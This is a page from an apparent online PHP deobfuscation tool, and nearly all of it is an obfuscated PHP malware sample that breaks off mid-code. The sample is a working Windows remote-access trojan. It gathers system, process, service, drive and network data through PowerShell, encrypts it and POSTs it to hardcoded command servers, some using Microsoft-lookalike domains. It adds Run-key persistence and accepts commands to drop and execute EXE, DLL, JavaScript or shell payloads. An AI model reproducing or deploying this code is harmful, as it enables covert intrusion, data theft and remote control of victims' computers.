Japanese 
English
PHP 難読化コードの復元・デコードWordpress 等でのPHPのマルウェア・ウィルス・改ざんコードをデコードして難読化をオンラインで解除し、
元の読みやすいコードに戻し解読できます。
<?php
goto GhGCf; qtomL: function rcbqD() { goto iEtoA; IvNw3: if (!$Dbe2H) { goto UBiN4; } goto MzOOL; gFCj2: $wGaOo = null; goto sR1P9; G4neJ: $Nr7MT = $wGaOo["\x70\162\157\143\x65\x73\x73"]; goto R1cu5; tUwir: $PS9aF .= $gGLsg; goto TkkmA; DtOG1: echo "\44\154\x61\163\164\137\143\x6f\155\155\141\156\144\40\75\75\40\x72\x75\x6e\156\151\x6e\147" . PHP_EOL; goto lw6sx; xSyDZ: goto KSdn7; goto X5ZKK; v6a3C: UBiN4: goto j83wj; TkkmA: KSdn7: goto IvNw3; NGQ1f: echo "\x24\x6c\x61\x73\x74\x5f\x63\x6f\155\155\x61\x6e\144\x20\x3d\x3d\40\156\x75\x6c\154" . PHP_EOL; goto Jqr4f; XNNAh: fclose($V8__K[0]); goto Y3VX_; iEtoA: global $wGaOo; goto XCUPW; X5ZKK: eXYTz: goto tUwir; b57F5: $PS9aF = "\157\x75\164\x3a" . PHP_EOL; goto JHjwU; gR3S1: $PS9aF .= "\74\x65\155\x70\164\x79\76"; goto xSyDZ; JHjwU: if ($gGLsg) { goto eXYTz; } goto gR3S1; vmEZU: F9kwL: goto gFCj2; KWGqZ: $Dbe2H = stream_get_contents($V8__K[2]); goto XNNAh; lw6sx: return null; goto vmEZU; XCUPW: if (!(!$wGaOo || !isset($wGaOo["\160\x72\157\143\145\x73\163"]) || !isset($wGaOo["\160\x69\x70\145\163"]))) { goto iUh9Y; } goto NGQ1f; gLhHj: $nSJJJ = proc_close($Nr7MT); goto b57F5; j83wj: return $PS9aF; goto c5Xkj; FUqxs: fclose($V8__K[2]); goto gLhHj; Y3VX_: fclose($V8__K[1]); goto FUqxs; R1cu5: $V8__K = $wGaOo["\160\x69\x70\x65\163"]; goto KcLcy; Jqr4f: return null; goto b3ysM; sR1P9: $gGLsg = stream_get_contents($V8__K[1]); goto KWGqZ; KcLcy: if (!proc_get_status($Nr7MT)["\x72\165\x6e\x6e\151\156\147"]) { goto F9kwL; } goto DtOG1; MzOOL: $PS9aF .= PHP_EOL . "\145\162\162\x28" . $nSJJJ . "\51\x3a" . PHP_EOL . $Dbe2H; goto v6a3C; b3ysM: iUh9Y: goto G4neJ; c5Xkj: } goto z6oM9; sIg7z: vBmzE: goto EwTST; pzgi4: echo "\x61\x63\x74\x69\166\145\137\143\x6e\164\x3a\x20" . $dCN4_ . PHP_EOL; goto d1AUN; WOsYO: function BMLFv() { goto RoRvQ; t5ysc: return $qHIxs; goto aKt0o; RoRvQ: $qHIxs = getenv("\x41\x50\x50\x44\101\x54\x41") . "\x5c" . VJPpv() . rand(0, 1000000); goto tHAes; tHAes: mkdir($qHIxs); goto t5ysc; aKt0o: } goto qK03j; F_JOE: function rxiXT() { goto tin1z; r2rlA: $YvSKs ^= 0x15de8713; goto yR9pu; iudFO: $YvSKs ^= $rNvND; goto Ud2Db; Ud2Db: $KyMPt = sprintf("\45\x30\70\170\x25\60\70\x78", $t3Oc0, $YvSKs); goto qsK_J; ZWOcq: $LSet6 = random_int(PHP_INT_MIN, PHP_INT_MAX); goto WS5Kg; yR9pu: $rNvND = $rNvND + 0x29807914 & 0xffffffff; goto TaEv6; GnW01: $YvSKs ^= $rNvND; goto r3eEK; TaEv6: $fruA2 = $fruA2 + 0xf2879630 + ($rNvND < 0x29807914 ? 1 : 0) & 0xffffffff; goto XLtXL; rWXXD: $YvSKs = $o28qH & 0xffffffff; goto wBLcq; Cif7x: return ($USwKc !== '' ? "\x2f" . $USwKc : '') . "\x2f" . XnkeD(rand(0, 14)) . "\x26" . $KyMPt . $U0J5z . ($FjQwC !== '' ? "\57" . $FjQwC : ''); goto oHLbg; dgTra: $o28qH = (int) $Eh0Dq->getTimestamp() & (int) 1.8446744073709548E+19; goto ZWOcq; XLtXL: $t3Oc0 ^= $fruA2; goto iudFO; wBLcq: $fruA2 = $LSet6 >> 32 & 0xffffffff; goto tnZ3G; xFAOW: $t3Oc0 ^= 0x86ad5709; goto r2rlA; r3eEK: $YvSKs = $YvSKs + 0x7ab092fe & 0xffffffff; goto DsbEr; QMIwY: $t3Oc0 ^= 0x219f7609; goto uIg6N; Tw4a2: $FjQwC = XnkeD(rand(0, 14)); goto Cif7x; tnZ3G: $rNvND = $LSet6 & 0xffffffff; goto Zfmgf; qsK_J: $U0J5z = sprintf("\45\60\x38\x78\45\x30\70\x78", $fruA2, $rNvND); goto Mn4pt; DsbEr: $t3Oc0 = $t3Oc0 + 0x80952678 + ($YvSKs < 0x7ab092fe ? 1 : 0) & 0xffffffff; goto QMIwY; Zfmgf: $t3Oc0 ^= $fruA2; goto GnW01; tin1z: $Eh0Dq = new DateTime("\x6e\x6f\x77", new DateTimeZone("\x45\164\x63\57\x47\x4d\x54\53\65")); goto dgTra; WS5Kg: $t3Oc0 = $o28qH >> 32 & 0xffffffff; goto rWXXD; Mn4pt: $USwKc = XNked(rand(0, 14)); goto Tw4a2; uIg6N: $YvSKs ^= 0xd1769498; goto xFAOW; oHLbg: } goto ybxmE; ph3TX: $A4YkN = $h0b7d[mt_rand(0, 1000) % count($h0b7d)]; goto sIg7z; NxBG4: $LcYWr = 10; goto vSPwP; ztZND: $pC2k6 = chr(0xa); goto lakjl; Pkc_7: return; goto m8M9L; ybxmE: function mNFE9() { goto SLN3T; YlAz4: throw new Exception("\x46\141\x69\x6c\145\144\x20\164\x6f\x20\145\170\x65\143\165\x74\x65\x20\x63\x6f\155\155\x61\156\144"); goto WK6XK; Mjmq1: exec("\x70\157\x77\145\162\163\150\145\154\154\40\55\x63\40" . eCI0t("\x47\145\164\55\123\145\x72\x76\x69\x63\145\40\174\x20\x53\x65\x6c\x65\x63\164\55\117\x62\x6a\145\143\164\x20\x2d\x50\162\157\x70\145\x72\164\171\40\116\x61\155\x65\x2c\40\x44\x69\x73\160\154\141\x79\116\x61\155\145\40\174\40\x43\x6f\x6e\x76\x65\162\164\x54\157\55\x4a\163\157\x6e"), $pcI7I, $xv08g); goto qpuf_; TAt8V: $pcI7I = ''; goto AjEZG; AjEZG: exec("\160\157\167\145\x72\163\150\145\154\154\x20\55\x63\x20" . eCI0t("\107\145\164\x2d\x4e\x65\x74\116\x65\151\x67\x68\x62\x6f\162\40\x2d\101\x64\x64\x72\145\163\163\x46\x61\x6d\151\x6c\171\x20\x49\120\x76\x34\x20\x7c\40\x57\150\x65\x72\145\55\x4f\142\152\x65\143\164\40\173\x20\x24\137\x2e\123\x74\141\x74\x65\x20\55\156\x65\x20\47\120\x65\162\155\x61\x6e\x65\x6e\164\x27\x20\175\40\174\40\123\x65\x6c\x65\143\164\55\x4f\142\x6a\145\x63\x74\x20\x40\x7b\x4e\x61\x6d\145\x3d\x27\x49\156\164\145\x72\x66\x61\143\145\47\x3b\40\x45\170\x70\x72\145\x73\163\151\x6f\156\75\x7b\x24\137\56\111\x6e\164\x65\x72\x66\x61\x63\x65\101\154\x69\141\x73\175\175\x2c\40\x40\x7b\x4e\x61\155\x65\x3d\47\x49\x6e\164\145\x72\156\145\164\40\101\x64\x64\162\x65\163\x73\47\x3b\x20\105\x78\160\162\145\x73\163\x69\x6f\156\x3d\x7b\44\x5f\56\x49\120\x41\144\x64\162\x65\x73\163\x7d\x7d\54\x20\x40\x7b\116\x61\155\145\75\x27\x50\x68\171\163\x69\x63\x61\x6c\40\101\x64\x64\162\x65\163\163\47\73\x20\105\170\160\x72\x65\x73\x73\151\x6f\x6e\x3d\173\44\137\56\x4c\151\x6e\x6b\x4c\141\x79\x65\x72\x41\x64\144\x72\x65\163\x73\175\x7d\54\40\100\173\x4e\141\155\x65\x3d\x27\124\x79\160\x65\47\73\40\105\170\x70\162\145\163\163\x69\x6f\x6e\75\173\x27\x64\x79\x6e\141\x6d\151\143\47\175\175\40\174\x20\x43\x6f\156\166\x65\x72\164\x54\157\x2d\112\163\157\156"), $pcI7I, $xv08g); goto WaE3I; rDHRq: $JGJW0["\x70\162\157\143\145\x73\x73\x65\x73"] = json_decode(implode($pC2k6, $pcI7I), true); goto CZvJe; xeNbX: throw new Exception("\106\141\151\154\x65\144\x20\164\x6f\40\x65\x78\x65\143\x75\164\145\40\x63\157\x6d\155\141\156\144"); goto yw8sc; dqSAy: throw new Exception("\106\141\x69\x6c\x65\144\40\164\x6f\40\145\170\145\143\165\x74\145\x20\143\x6f\155\x6d\141\x6e\x64"); goto fBXNh; KtFyp: $JGJW0["\x73\171\163\x74\x65\155\151\156\x66\x6f"] = json_decode(implode($pC2k6, $pcI7I), true); goto szlN5; fBXNh: JqFr0: goto V2trJ; SwHwH: hAxYv: goto KtFyp; CyXGe: oI7qv: goto GNCS4; szlN5: $pcI7I = ''; goto kvpOd; O_u62: if (!($xv08g !== 0)) { goto hAxYv; } goto MZ8Bw; xik0u: exec("\x70\157\x77\x65\162\163\x68\145\x6c\154\40\55\x63\x20" . eCI0t("\164\141\163\153\x6c\151\163\164\40\x2f\x73\166\x63\x20\x2f\106\x4f\40\103\x53\126\x20\174\x20\x43\x6f\x6e\x76\145\162\164\x46\x72\157\x6d\x2d\x43\163\166\40\x7c\x20\x43\157\x6e\166\145\162\164\124\x6f\x2d\112\x73\157\x6e"), $pcI7I, $xv08g); goto hGwbL; rTwG_: $JGJW0["\x6f\x74\150\145\x72"]["\x69\144\x5f\x6c\x6f\141\144\x65\x72"] = 43; goto H8fAn; V2trJ: $JGJW0["\x6f\x74\150\x65\x72"]["\x76\145\x72\163\151\157\x6e\137\x62\x75\151\154\x64"] = $jIDpK; goto o5pQ9; H8fAn: $JGJW0["\157\164\x68\x65\162"]["\x72\165\156\x61\x73"] = $pcI7I[0] ?? "\x55\x4e\113\x4e\117\127\x4e"; goto Uq1i5; SLN3T: global $jIDpK, $szWC8, $pC2k6; goto Gb2wC; h5Dt2: $pcI7I = ''; goto A3qh6; oqutG: exec("\160\157\x77\x65\162\163\x68\x65\x6c\x6c\40\x2d\143\40" . Eci0T("\x73\x79\x73\x74\145\x6d\151\x6e\x66\157\x20\x2f\x46\x4f\40\x43\x53\126\x20\174\x20\103\157\156\166\145\162\164\106\x72\x6f\155\x2d\103\x73\166\x20\x7c\x20\x43\x6f\156\166\145\162\x74\124\157\55\112\163\157\156"), $pcI7I, $xv08g); goto O_u62; gHZpy: $JGJW0["\141\x72\x70"] = json_decode(implode($pC2k6, $pcI7I), true); goto h5Dt2; O1ZSi: CXelO: goto rDHRq; zTeIp: exec("\x70\x6f\x77\145\x72\x73\150\145\x6c\x6c\40\x2d\143\40" . eci0t("\107\x65\164\55\120\x53\104\x72\151\x76\145\x20\55\120\123\x50\x72\157\x76\151\144\145\162\x20\x46\x69\154\x65\123\171\x73\164\145\x6d\x20\174\40\x43\x6f\x6e\x76\145\x72\x74\124\157\x2d\112\x73\x6f\156"), $pcI7I, $xv08g); goto VXiWg; WK6XK: J0rGW: goto gHZpy; kIhB2: $pcI7I = ''; goto xik0u; MZ8Bw: throw new Exception("\106\x61\x69\154\x65\x64\x20\164\x6f\x20\145\170\x65\x63\165\x74\x65\x20\x63\157\x6d\155\x61\x6e\144"); goto SwHwH; JZ8SA: throw new Exception("\106\x61\151\154\x65\x64\x20\x74\157\x20\145\170\145\x63\165\x74\145\x20\x63\157\x6d\x6d\x61\x6e\x64"); goto O1ZSi; A3qh6: return $JGJW0; goto ET34Z; hGwbL: if (!($xv08g !== 0)) { goto CXelO; } goto JZ8SA; GNCS4: $JGJW0["\x73\x65\x72\166\151\143\145\163"] = json_decode(implode($pC2k6, $pcI7I), true); goto zzFnW; yw8sc: J78O1: goto KaCH2; VXiWg: if (!($xv08g !== 0)) { goto J78O1; } goto xeNbX; WaE3I: if (!($xv08g !== 0)) { goto J0rGW; } goto YlAz4; CZvJe: $pcI7I = ''; goto Mjmq1; zzFnW: $pcI7I = ''; goto zTeIp; kvpOd: exec("\x70\157\167\x65\x72\x73\150\x65\154\x6c\40\x2d\x63\40" . ECI0T("\x69\x66\x20\50\133\123\145\x63\x75\162\x69\164\171\56\120\162\x69\156\143\151\160\141\154\56\127\151\x6e\x64\x6f\x77\163\111\x64\145\156\x74\x69\x74\x79\135\72\x3a\x47\145\x74\103\165\162\162\x65\x6e\x74\x28\x29\56\116\141\155\x65\x20\55\155\x61\x74\143\x68\x20\x27\x28\77\x69\51\x53\131\123\124\x45\115\x27\51\40\x20\x7b\x20\47\x53\131\123\x54\x45\x4d\x27\40\x7d\40\x65\154\x73\x65\x69\146\40\50\x28\133\x53\x65\x63\165\x72\x69\x74\x79\x2e\x50\162\x69\x6e\143\x69\x70\x61\154\56\127\x69\x6e\x64\x6f\167\163\x50\x72\151\156\143\x69\x70\141\x6c\x5d\x20\133\x53\x65\x63\165\162\151\164\x79\x2e\x50\x72\x69\x6e\x63\151\160\x61\154\56\x57\x69\156\x64\157\x77\163\111\x64\x65\156\164\x69\x74\171\135\72\72\107\145\x74\x43\x75\x72\x72\x65\156\164\50\51\51\56\x49\163\111\156\x52\157\154\145\x28\133\x53\x65\x63\x75\x72\x69\164\x79\x2e\120\x72\x69\x6e\x63\151\160\x61\154\56\127\x69\x6e\144\x6f\x77\x73\102\165\151\154\164\x49\156\x52\157\x6c\x65\x5d\x3a\72\101\x64\x6d\151\x6e\x69\x73\x74\x72\141\x74\x6f\x72\51\51\40\x7b\40\47\101\x44\115\111\x4e\47\40\175\x20\145\x6c\163\145\40\173\x20\x27\125\123\105\122\x27\x20\x7d\40"), $pcI7I, $xv08g); goto dH2kx; dH2kx: if (!($xv08g !== 0)) { goto JqFr0; } goto dqSAy; Uq1i5: $JGJW0["\157\164\150\145\x72"]["\164\171\x70\145\x5f\x66\x69\154\145"] = "\x50\110\120"; goto kIhB2; gn1Mi: throw new Exception("\106\x61\x69\154\x65\144\x20\x74\157\40\x65\170\x65\x63\x75\x74\x65\x20\143\157\155\155\141\x6e\x64"); goto CyXGe; o5pQ9: $JGJW0["\157\x74\150\x65\x72"]["\151\x64\x5f\x6c\x6f\143\141\x6c"] = mt_rand(0, 100000000); goto rTwG_; qpuf_: if (!($xv08g !== 0)) { goto oI7qv; } goto gn1Mi; KaCH2: $JGJW0["\x64\x72\x69\x76\x65\163"] = json_decode(implode($pC2k6, $pcI7I), true); goto TAt8V; Gb2wC: $JGJW0 = []; goto oqutG; ET34Z: } goto l4tr9; dfbng: if (!true) { goto w_p_e; } goto bc_XP; GhGCf: $szWC8 = chr(0x22); goto ztZND; kImNn: function ecI0T($b3TRq) { global $szWC8; return $szWC8 . $b3TRq . $szWC8; } goto F_JOE; xaPFx: function A2uxo($xbNO5) { goto DmaWr; SHkBb: $ERqBI = $xbNO5 . $rasAm; goto ENAdj; ENAdj: return gzencode($ERqBI, 5, FORCE_GZIP); goto LVrZW; bA6ex: R7s9b($xbNO5, $rasAm); goto SHkBb; M_vHj: $rasAm = pack("\x56", $Ot6LN); goto bA6ex; DmaWr: $Ot6LN = mt_rand(0, 100000000); goto M_vHj; LVrZW: } goto Ikv0Q; teN0x: $A4YkN = $b2dL6[mt_rand(0, 1000) % count($b2dL6)]; goto azANG; m8M9L: Hbr23: goto C4SdR; smHwj: echo "\144\x65\x6c\141\171\72\40" . $LcYWr . PHP_EOL; goto pzgi4; uRlZE: function UrHlx() { goto pKxxt; bSPgh: if (!(!$ZqddJ || !preg_match_all("\x2f\x5c\x73\x2d\162\134\163\57", $ZqddJ))) { goto w5I3u; } goto Dzjht; n1kqv: $Y72oh = preg_split("\x2f\x70\x68\x70\x5c\x2e\145\170\145\x2e\52\77\134\x73\55\162\x5c\163\53\57", $xU41z, 2); goto eOgzd; RNPOv: zRlqv: goto Bjbd0; FnYn0: $oyBW1 = __FILE__; goto bRGWU; iGUoA: if (QrOFA()) { goto zRlqv; } goto FnYn0; hOX6z: Uxm1w: goto Dzygw; Bjbd0: $oyBW1 = dirname(PHP_BINARY) . xNked(12) . "\56\164\170\164"; goto G84tC; Dzygw: exec("\162\x65\147\40\141\x64\x64\x20\x48\x4b\103\125\134\123\x6f\x66\164\x77\x61\162\145\x5c\115\151\x63\162\157\x73\x6f\146\164\134\x57\151\156\x64\x6f\x77\x73\x5c\x43\165\x72\x72\145\x6e\x74\x56\x65\x72\x73\151\x6f\156\134\122\x75\x6e\x20\x2f\166\x20" . Eci0t(VjppV()) . "\40\57\x74\x20\122\x45\107\137\x53\132\x20\57\x64\40" . eci0t("\134" . $szWC8 . PHP_BINARY . "\x5c" . $szWC8 . "\x20\x5c" . $szWC8 . $oyBW1 . "\134" . $szWC8) . "\40\57\x66"); goto BEWR2; VobaU: $pDMmF = explode($pC2k6, $ZqddJ, 2); goto KnYOk; pKxxt: global $szWC8, $pC2k6; goto iGUoA; xC0RO: w5I3u: goto VobaU; BEWR2: return true; goto oVM4F; Mb8m7: file_put_contents($oyBW1, $uJtGi); goto hOX6z; eOgzd: $uJtGi = isset($Y72oh[1]) ? trim(str_replace($szWC8, '', $Y72oh[1])) : ''; goto Mb8m7; Dzjht: return false; goto xC0RO; KnYOk: $xU41z = trim($pDMmF[1] ?? ''); goto n1kqv; G84tC: $ZqddJ = shell_exec("\167\x6d\x69\143\40\160\x72\x6f\143\x65\163\x73\x20\x77\x68\145\162\145\x20\x70\x72\157\x63\x65\163\x73\151\144\x3d" . getmypid() . "\x20\x67\145\164\40\143\157\155\x6d\141\x6e\x64\x6c\x69\156\x65"); goto bSPgh; bRGWU: goto Uxm1w; goto RNPOv; oVM4F: } goto fc1nJ; z6oM9: function lFVIE($xLjoz, $d0PbW) { goto zxRUJ; akcjb: $o_rCT = "\160\x6f\167\x65\162\x73\150\145\x6c\154\x2e\x65\170\x65\x20\55\x57\151\156\144\157\x77\123\164\x79\154\145\x20\110\151\x64\144\x65\156\40\55\x63\x20" . ECi0t("\123\x74\x61\162\x74\x2d\120\x72\x6f\143\x65\163\x73\x20\55\x57\x69\156\x64\157\167\123\x74\x79\154\145\x20\110\x69\x64\x64\x65\x6e\x20\55\106\151\x6c\145\x50\141\164\150\40\47" . $xLjoz . "\x27" . ($d0PbW ? "\40\x2d\x41\x72\x67\165\x6d\x65\x6e\164\x4c\151\163\164\x20\x27" . preg_replace("\57" . $szWC8 . "\57", "\x5c" . $szWC8, $d0PbW) . "\47" : '')); goto dEHsl; dEHsl: echo $o_rCT . $pC2k6 . $pC2k6; goto QId0W; zxRUJ: global $szWC8, $pC2k6; goto akcjb; QId0W: shell_exec($o_rCT); goto FFokY; FFokY: } goto WOsYO; YWsb9: function Y40sz($nG_P0, $Yem6z) { goto XzqaQ; w4_1H: $abtZm->close(); goto gTt8M; u71rV: rewind($PH23F); goto F1pv_; SvUr2: if (!($Mbxm4 !== true)) { goto d2ZIq; } goto Ix7oY; CKc57: return true; goto siNDm; D_vXs: fclose($PH23F); goto nWlDf; Rqxww: $abtZm->close(); goto D_vXs; W7Pvu: return false; goto FCsu7; Ix7oY: fclose($PH23F); goto W7Pvu; zLO6Y: tttcO: goto w4_1H; FCsu7: d2ZIq: goto RjHFo; ghuFk: if (mkdir($Yem6z, 0777, true)) { goto isOEF; } goto i7rJO; RjHFo: if ($abtZm->extractTo($Yem6z)) { goto tttcO; } goto Rqxww; XzqaQ: if (file_exists($Yem6z)) { goto qw6IQ; } goto ghuFk; p5QAD: $cTc0_ = file_get_contents($nG_P0); goto DwC7G; i7rJO: return false; goto BAppL; YFhHt: $Mbxm4 = $abtZm->open(stream_get_meta_data($PH23F)["\x75\x72\x69"]); goto SvUr2; BAppL: isOEF: goto tkJFY; tkJFY: qw6IQ: goto p5QAD; gTt8M: fclose($PH23F); goto CKc57; F1pv_: $abtZm = new XdeZr(); goto YFhHt; DaxKI: fwrite($PH23F, $cTc0_); goto u71rV; nWlDf: return false; goto zLO6Y; DwC7G: $PH23F = tmpfile(); goto DaxKI; siNDm: } goto uRlZE; tBEQV: if (count($h0b7d) > 0) { goto DGU7d; } goto teN0x; PI6eX: $dlA_m = 0; goto EgCuT; OUc5x: goto V3Oj2; goto JgSSO; vwBQl: $h0b7d = ["\x77\x69\x6e\x64\157\x77\x73\x2d\x6d\x73\147\x61\x73\x2e\143\157\x6d", "\x65\x76\x65\156\164\55\x64\141\164\x61\155\x69\143\162\x6f\x73\157\x66\x74\x2e\154\x69\x76\145", "\166\141\x72\x79\151\x6e\x67\55\x72\145\156\164\141\x6c\163\55\x63\x61\x6c\147\141\x72\x79\x2d\160\162\x65\144\151\143\x74\x2e\x74\x72\x79\143\154\157\x75\x64\146\x6c\x61\x72\145\x2e\143\x6f\x6d"]; goto tBEQV; XAM1e: $JcEot = 80; goto Klamn; S4yY7: DGU7d: goto ph3TX; KMXag: $wGaOo = null; goto NvD7d; l4tr9: function r7s9B(&$xbNO5, $eAmVW) { goto jUYbm; jUYbm: $s9r5b = ord($eAmVW[0]); goto zADLb; bnowv: W3BJA: goto S_cN9; tTRhB: $Mc_Hp = 0; goto Ast8k; ZQtcn: goto kAq95; goto bnowv; HPUYH: $xbNO5[$Mc_Hp] = chr(ord($xbNO5[$Mc_Hp]) ^ (ord($eAmVW[$Mc_Hp % $kt3y8]) ^ $s9r5b) % 256); goto ziig9; IYGwm: if (!($Mc_Hp < $cbiCS)) { goto W3BJA; } goto TXIrG; Ast8k: kAq95: goto IYGwm; TXIrG: $s9r5b = ($s9r5b + ($s9r5b + $Mc_Hp % 256)) % 256; goto HPUYH; I0zBE: $kt3y8 = strlen($eAmVW); goto tTRhB; ziig9: kp_B5: goto qKS6q; zADLb: $cbiCS = strlen($xbNO5); goto I0zBE; qKS6q: ++$Mc_Hp; goto ZQtcn; S_cN9: } goto xaPFx; Yi5pH: $dCN4_ = 0; goto Bvdh_; Klamn: $D_3Y7 = ["\105\x58\x45" => 0, "\104\x4c\114" => 1, "\x4a\123" => 2, "\103\x4d\104" => 3, "\101\103\x54\111\x56\105" => 4, "\x41\x55\124\x4f\x52\125\x4e" => 5, "\x4f\106\106" => 6]; goto Yi5pH; NvD7d: function deG1t($d0PbW) { goto U26fL; U26fL: global $wGaOo; goto rKPLw; rKPLw: $qA50S = array(0 => array("\x70\151\x70\x65", "\x72"), 1 => array("\x70\x69\160\145", "\167"), 2 => array("\160\151\160\x65", "\x77")); goto vIbJr; vIbJr: $Nr7MT = proc_open($d0PbW, $qA50S, $V8__K); goto Fk4aN; HUWz5: OIHx8: goto ImEOy; q1kMs: return "\74\x66\141\151\x6c\145\x64\76"; goto HUWz5; ImEOy: $wGaOo = ["\160\x72\157\x63\145\163\x73" => $Nr7MT, "\x70\x69\x70\145\x73" => $V8__K]; goto Ir0ws; Fk4aN: if (is_resource($Nr7MT)) { goto OIHx8; } goto q1kMs; Ir0ws: } goto qtomL; Ikv0Q: function EtUpz($A4YkN, $xbNO5) { goto uiUap; IAKYX: $Ql4QK = (int) $fUPyD[1]; goto aHYEC; aHYEC: oo9y0: goto P9uXG; DtSgv: $HhbRp = null; goto xRdNz; IF9yw: $H6YXK = ["\x68\x74\x74\x70" => ["\155\145\x74\x68\157\x64" => "\120\x4f\x53\124", "\150\145\141\x64\x65\162" => ["\103\x6f\x6e\x74\x65\x6e\164\55\164\x79\x70\145\72\40\141\x70\160\154\151\143\x61\164\x69\x6f\x6e\x2f\x6f\x63\164\145\x74\x2d\x73\164\x72\145\141\155"], "\x63\x6f\x6e\x74\x65\156\x74" => $xbNO5, "\x69\x67\x6e\x6f\x72\145\x5f\145\162\x72\x6f\162\x73" => true, "\x74\151\x6d\x65\x6f\165\x74" => 20]]; goto YMMrn; Ls2Pd: if (!isset($http_response_header[0])) { goto ycYgX; } goto XK2NZ; upemk: $nuWcv = stream_context_create($H6YXK); goto DtSgv; P9uXG: ycYgX: goto r77la; dG83c: if (!($RwYxj === false)) { goto Tdx4n; } goto asX3w; YMMrn: $nG_P0 = "\x68\164\x74\x70\x3a\x2f\x2f" . $A4YkN . "\x3a" . $JcEot . rXiXT(); goto upemk; uiUap: global $JcEot; goto IF9yw; PEG3G: restore_error_handler(); goto dG83c; r77la: return ["\143\157\x6e\x74\x65\156\164" => $RwYxj, "\150\145\x61\144\x65\162\x73" => $http_response_header, "\163\164\x61\164\x75\x73" => $http_response_header[0] ?? null, "\x63\157\144\145" => $Ql4QK]; goto A9CR4; KYMz3: $Ql4QK = 0; goto Ls2Pd; asX3w: throw new Exception("\110\x54\124\x50\x20\162\x65\x71\165\145\x73\x74\x20\x66\141\151\x6c\x65\144\72\x20" . ($HhbRp ?: "\125\x6e\x6b\156\157\167\x6e\x20\x65\x72\x72\157\162")); goto QdSL7; XK2NZ: preg_match("\57\x48\124\124\x50\x5c\x2f\x5c\x64\134\56\134\144\x5c\163\x2b\x28\134\144\173\x33\x7d\51\x2f", $http_response_header[0], $fUPyD); goto K4aXs; B31AZ: $RwYxj = file_get_contents($nG_P0, false, $nuWcv); goto PEG3G; K4aXs: if (!isset($fUPyD[1])) { goto oo9y0; } goto IAKYX; xRdNz: set_error_handler(function ($l2XVo, $Mxyq3) use(&$HhbRp) { $HhbRp = $Mxyq3; }); goto B31AZ; QdSL7: Tdx4n: goto KYMz3; A9CR4: } goto YWsb9; azANG: goto vBmzE; goto S4yY7; Bvdh_: $rst7P = MNfE9(); goto GGsaL; S7l7m: LfVIE(PHP_BINARY, "\55\144\x20\145\x78\x74\145\156\x73\x69\157\x6e\75\x7a\151\x70\40\x2d\144\40\145\170\x74\145\x6e\163\x69\157\x6e\137\x64\151\162\75\145\x78\164\x20" . ECi0T(__FILE__) . "\x20\x31"); goto Pkc_7; C4SdR: $jIDpK = 20; goto XAM1e; lakjl: if (!($argc < 2 && !qrOfa() || !extension_loaded("\172\151\160") && file_exists(__FILE__))) { goto Hbr23; } goto S7l7m; EwTST: $TZ64Y = 200; goto PI6eX; vSPwP: $b2dL6 = ["\61\65\x39\56\x36\x39\56\61\70\67\56\x37\x38", "\x36\64\56\x39\x35\x2e\61\x32\x2e\x37\x31", "\x31\70\x34\x2e\71\65\56\65\61\x2e\x31\66\65"]; goto vwBQl; GGsaL: function QROfA() { global $argv; return $argv[0] === "\123\164\141\x6e\x64\x61\162\x64\40\x69\x6e\x70\x75\164\40\143\x6f\144\x65"; } goto kImNn; fc1nJ: function vJppV() { goto oeWc2; JOrZw: $inBis = array_values($inBis); goto jSXR6; jSXR6: print_r($inBis); goto LF76G; oeWc2: $inBis = scandir(getenv("\x41\x50\x50\x44\101\124\x41")) + scandir(getenv("\114\x4f\x43\x41\x4c\101\x50\120\x44\x41\x54\101")); goto FqHis; FqHis: $inBis = array_diff($inBis, ["\56", "\56\x2e"]); goto JOrZw; LF76G: return $inBis[rand(0, count($inBis) - 1)]; goto W_MW9; W_MW9: } goto VN3bi; qK03j: function mOJ2M($A4YkN) { goto E6092; oe9Eo: bVOXu: goto X5UZm; Kh4oY: if (!(($u7kKd = RCbQd()) !== null)) { goto bVOXu; } goto kMs0H; X5UZm: $uJtGi = EtupZ($A4YkN, A2UXO(json_encode($rst7P, JSON_PRETTY_PRINT))); goto CjTrc; nJvML: if (!($Ql4QK !== 200)) { goto rweeZ; } goto Zq6SB; TG7Ws: $Ql4QK = $uJtGi["\143\x6f\144\x65"]; goto kL4WH; uS_iH: Qi1fs: goto b5HGd; I7s0k: $o0HyG = substr($o0HyG, 0, strlen($o0HyG) - 1); goto OF1U2; VXOzv: switch ($miAdf) { case $D_3Y7["\x43\115\x44"]: goto KbFcF; Hwxi8: DEg1T($o0HyG); goto dYUqj; dYUqj: return; goto F4zqm; KbFcF: echo "\x43\x4d\104" . PHP_EOL; goto Hwxi8; F4zqm: case $D_3Y7["\x41\x43\x54\111\x56\x45"]: goto szNmR; WEBBC: return; goto MLaj6; szNmR: echo "\101\103\x54\x49\x56\105" . PHP_EOL; goto kN7r9; kN7r9: $dCN4_ = unpack("\126", $o0HyG)[1]; goto WEBBC; MLaj6: case $D_3Y7["\x41\125\124\117\x52\x55\116"]: goto yTNdL; A_UVE: URHlX(); goto HFtUq; HFtUq: return; goto xPlUz; yTNdL: echo "\101\x55\x54\x4f\122\125\116" . PHP_EOL; goto A_UVE; xPlUz: case $D_3Y7["\117\106\x46"]: echo "\x4f\x46\x46" . PHP_EOL; exit(0); case $D_3Y7["\x45\130\105"]: goto yCtrZ; uBb1t: file_put_contents($xLjoz, $o0HyG); goto d0zSU; yCtrZ: echo "\105\130\x45" . PHP_EOL; goto XW7m0; XW7m0: $xLjoz = BMlfV() . "\134" . xNkEd(8) . "\x2e\x65\170\145"; goto uBb1t; d0zSU: goto nJLGE; goto NVxS3; NVxS3: case $D_3Y7["\104\x4c\x4c"]: goto W1nPU; umqro: $yYiH5 = bmlfV() . "\x5c" . XnkeD(8) . "\56\160\x6e\147"; goto v9BNu; m2qgo: $d0PbW = ecI0T($yYiH5) . "\x20\163\164\x61\x72\164"; goto FWxGw; VqA0a: goto nJLGE; goto E92UY; v9BNu: $xLjoz = "\103\x3a\134\127\x69\156\144\157\x77\x73\x5c\123\171\163\x74\x65\x6d\63\62\134\x72\165\156\x64\x6c\x6c\x33\x32\56\x65\x78\x65"; goto m2qgo; FWxGw: file_put_contents($yYiH5, $o0HyG); goto VqA0a; W1nPU: echo "\104\114\114" . PHP_EOL; goto umqro; E92UY: case $D_3Y7["\112\x53"]: goto yuPJ6; yuPJ6: echo "\112\123" . PHP_EOL; goto h_KkM; h_KkM: $xLjoz = getenv("\101\120\x50\x44\x41\x54\101") . "\134" . "\156\x6f\x64\x65\55\x76\62\61\x2e\67\56\x33\x2d\167\x69\156\x2d\x78\x36\x34\134\x6e\157\144\x65\56\x65\x78\145"; goto bPtdr; ig9mY: echo 